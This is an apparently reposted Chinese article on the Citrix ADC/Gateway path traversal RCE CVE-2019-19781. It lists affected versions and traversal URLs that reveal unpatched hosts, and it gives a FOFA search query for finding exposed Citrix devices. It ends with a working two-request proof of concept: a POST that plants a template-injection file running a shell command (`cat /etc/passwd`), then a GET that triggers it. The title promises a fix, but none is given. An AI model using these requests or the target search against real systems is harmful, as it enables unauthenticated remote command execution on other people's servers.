Citrix路径遍历RCE漏洞（CVE-2019-19781）分析与修复

漏洞描述

Citrix旗下多款交付控制器和网关存在RCE漏洞，攻击者在无需身份验证的情况下就可执行任意命令。根据其他安全 网站 的说法，这个RCE漏洞会有一个标记漏洞（其中之一的标记），即本次报道的Citrx路径遍历漏洞（CVE-2019-19781）。Citrx路径遍历漏洞（CVE-2019-19781）利用方式的PoC已被公开。该漏洞利用复杂性低，且无权限要求，攻击者只能遍历vpns文件夹，但攻击者可能利用Citrx路径遍历漏洞进行RCE漏洞试探，从而发起进一步精准攻击。

影响范围

Citrix NetScaler ADC and NetScaler Gateway version 10.5，Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 ，Citrix ADC and Citrix Gateway version 13.0

漏洞 检测 方法

根据此次公开的PoC显示，该洞目录遍历被限制子在vpns 文件夹  下，任意用户可通过HTTP请求直接访问该目录下的文件。

https://xx.xx.xx.xx/vpn/../vpns/services.htmlhttps://xx.xx.xx.xx/vpn/../vpns/smb.conf如果没有修复的话的会返回 http 200

通过fofa搜索

title="Citrix"

目前还是有很多没打补丁的

附上POC，建议修改文件名，文件名为：jas502n

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Host: 192.168.3.244User-Agent: 1Connection: closeNSC_USER: ../../../netscaler/portal/templates/jas502nNSC_NONCE: nsrootContent-Length: 97 url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]

请求上传的内容

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1Host: 192.168.3.244User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeNSC_USER: nsrootNSC_NONCE: nsrootUpgrade-Insecure-Requests: 1Cache-Control: max-age=0

以上代码来自jas502n大佬，GitHub地址：https://github.com/jas502n/CVE-2019-19781

免责声明：本文系网络转载或改编，未找到原创作者，版权归原作者所有。如涉及版权，请联系删